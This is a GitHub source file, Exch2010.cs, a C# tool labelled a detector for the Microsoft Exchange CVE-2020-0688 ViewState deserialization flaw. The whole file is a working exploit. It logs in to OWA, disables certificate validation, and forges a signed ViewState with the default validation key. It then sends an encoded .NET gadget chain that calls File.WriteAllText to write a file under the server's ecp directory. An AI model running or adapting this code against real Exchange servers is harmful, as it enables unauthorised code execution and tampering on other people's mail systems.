-
Notifications
You must be signed in to change notification settings - Fork 3
/
Exch2010.cs
176 lines (164 loc) · 9.03 KB
/
Exch2010.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
using System;
using System.Data;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections;
using System.Collections.Generic;
using System.Collections.Specialized;
using System.Threading;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Net;
using System.Reflection;
using System.Runtime;
using System.Runtime.InteropServices;
using System.Web;
using System.Globalization;
using System.Security.Cryptography.X509Certificates;
using System.Net.Security;
namespace Zcg.Exploit.Remote
{
class ExchangeCmd
{
static bool cert(object o, X509Certificate x, X509Chain c, SslPolicyErrors s) { return true; }
static byte[] _mackey = null;
static uint _clientstateid = 0;
static string _vsg = null;
static string target = null;
static string user = null;
static string pass = null;
static string cookie = "";
static int Main(string[] args)
{
Console.WriteLine("Detector for CVE-2020-0688(Microsoft Exchange default MachineKeySection deserialize vulnerability).");
Console.WriteLine("Part of GMH's fuck Tools, Code By zcgonvh.\r\n");
if (args.Length < 3)
{
Console.WriteLine("usage: ExchangeDetect <target> <user> <pass>");
Console.WriteLine();
return 0;
}
try
{
target = args[0];
user = args[1];
pass = args[2];
ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(cert);
ServicePointManager.Expect100Continue = false;
ServicePointManager.DefaultConnectionLimit = int.MaxValue;
ServicePointManager.MaxServicePoints = int.MaxValue;
HttpWebRequest hwr = WebRequest.Create("https://" + target + "/owa/auth.owa") as HttpWebRequest;
// Create a new cookie container to hold the custom cookie
CookieContainer cookieContainer = new CookieContainer();
cookieContainer.Add(new Cookie("PBack", "0") { Domain = target });
hwr.AllowAutoRedirect = false;
hwr.Method = "POST";
hwr.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)";
hwr.ContentType = "application/x-www-form-urlencoded";
hwr.CookieContainer = cookieContainer;
byte[] post = Encoding.UTF8.GetBytes("destination=https%3A%2F%2F" + target + "%2Fecp%2F&flags=4&forcedownlevel=0&username=" + HttpUtility.UrlEncode(user) + "&password=" + HttpUtility.UrlEncode(pass) + "&passwordText=&isUtf8=1");
hwr.ContentLength = post.Length;
// Set up the proxy
//string proxyUri = "http://127.0.0.1:8080";
//hwr.Proxy = new WebProxy(proxyUri);
hwr.GetRequestStream().Write(post, 0, post.Length);
HttpWebResponse res = hwr.GetResponse() as HttpWebResponse;
if (res.StatusCode != (HttpStatusCode)302)
{
Console.WriteLine("[x]bad login response");
Console.Read();
return 1;
}
if (res.Headers.GetValues("Set-Cookie") != null)
{
foreach (string s in res.Headers.GetValues("Set-Cookie"))
{
cookie += s.Split(' ')[0] + " ";
}
}
Console.WriteLine(cookie.ToString());
if (cookie.IndexOf("cadata") == -1)
{
Console.WriteLine("[x]login fail");
Console.Read();
return 2;
}
cookie += "ASP.NET_SessionId=;";
UpdateMacKey("B97B4E27", null);
hwr = WebRequest.Create("https://" + target + "/ecp/default.aspx?__VIEWSTATE=" + HttpUtility.UrlEncode(CreateViewState(detect)) + "&__VIEWSTATEGENERATOR=" + _vsg) as HttpWebRequest;
//hwr.Proxy = new WebProxy(proxyUri);
hwr.AllowAutoRedirect = false;
hwr.Method = "GET";
hwr.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)";
hwr.Headers.Add("Cookie", cookie);
if (hwr.GetResponse().Headers["X-ZCG-TEST"] == "CVE-2020-0688")
{
Console.WriteLine("[!] " + target + " was vulnerable");
Console.Read();
return 4;
}
}
catch (Exception ex)
{
Console.WriteLine("[x]error:");
Console.WriteLine(ex);
Console.Read();
return 3;
}
Console.Read();
return 0;
}
static bool UpdateMacKey(string vsg, string userkey)
{
_vsg = vsg;
if (!uint.TryParse(_vsg, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid))
{
return false;
}
//System.Web.UI.ObjectStateFormatter.GetMacKeyModifier
if (userkey != null)
{
int byteCount = Encoding.Unicode.GetByteCount(userkey);
_mackey = new byte[byteCount + 4];
Encoding.Unicode.GetBytes(userkey, 0, userkey.Length, _mackey, 4);
}
else
{
_mackey = new byte[4];
}
_mackey[0] = (byte)_clientstateid;
_mackey[1] = (byte)(_clientstateid >> 8);
_mackey[2] = (byte)(_clientstateid >> 16);
_mackey[3] = (byte)(_clientstateid >> 24);
return true;
}
static string CreateViewState(byte[] dat)
{
MemoryStream ms = new MemoryStream();
ms.WriteByte(0xff);
ms.WriteByte(0x01);
ms.WriteByte(0x32);
uint num = (uint)dat.Length;
while (num >= 0x80)
{
ms.WriteByte((byte)(num | 0x80));
num = num >> 0x7;
}
ms.WriteByte((byte)num);
ms.Write(dat, 0, dat.Length);
byte[] data = ms.ToArray();
byte[] validationKey = new byte[] { 0xCB, 0x27, 0x21, 0xAB, 0xDA, 0xF8, 0xE9, 0xDC, 0x51, 0x6D, 0x62, 0x1D, 0x8B, 0x8B, 0xF1, 0x3A, 0x2C, 0x9E, 0x86, 0x89, 0xA2, 0x53, 0x03, 0xBF };
ms = new MemoryStream();
ms.Write(data, 0, data.Length);
ms.Write(_mackey, 0, _mackey.Length);
byte[] hash = (new HMACSHA1(validationKey)).ComputeHash(ms.ToArray());
ms = new MemoryStream();
ms.Write(data, 0, data.Length);
ms.Write(hash, 0, hash.Length);
return Convert.ToBase64String(ms.ToArray());
}
static string base64String = "AAEAAAD/////AQAAAAAAAAAEAQAAADJTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3RdXQIAAAAGX2l0ZW1zBV9zaXplBQAICQIAAAACAAAAEAIAAAAEAAAACQMAAAAJBAAAAA0CDAUAAAAeU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsBQMAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFAXgFAAAACQYAAAAJBwAAAAwIAAAABlN5c3RlbQUEAAAANVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlRyZWVTZXRgMVtbU3lzdGVtLlN0cmluZ11dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAQABggBeAUAAAAICAAAAAIAAAAJAwAAAAEAAAAJCgAAAAQGAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgGCwAAAC9TeXN0ZW0uQXJyYXkrRnVuY3RvckNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQQAAAAGDAAAAAhtc2NvcmxpYhAHAAAAAgAAAAkNAAAACQ4AAAARCgAAAAIAAAAGDwAAAAAGEAAAAFBDOlxQcm9ncmFtIEZpbGVzXE1pY3Jvc29mdFxFeGNoYW5nZSBTZXJ2ZXJcVjE0XENsaWVudEFjY2Vzc1xlY3BcTGl2ZUlkRXJyb3IuYXNweAQNAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlAAF4AQEBCREAAAANAA0ABA4AAAA9U3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0NvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQAAAAAEEQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkAEnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQEBAQEBBhQAAABEU3lzdGVtLkFjdGlvbmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliXV0GFQAAAE5TeXN0ZW0uQ29yZSwgVmVyc2lvbj0zLjUuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkNAAkMAAAABhcAAAAOU3lzdGVtLklPLkZpbGUGGAAAAAxXcml0ZUFsbFRleHQJGQAAAAQSAAAAAXgGAAAAAAAAAAAAAQEBAQABCA0ADQANAA0AAAAAAA0AARMAAAASAAAABh4AAAAHQ29tcGFyZQ0ABiAAAAANU3lzdGVtLlN0cmluZw0ACAAAAAoBGQAAABEAAAAGIgAAACRTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nXV0JDAAAAA0ACQwAAAAJIAAAAAkeAAAACw==";
public static byte[] detect = Convert.FromBase64String(base64String);
}
}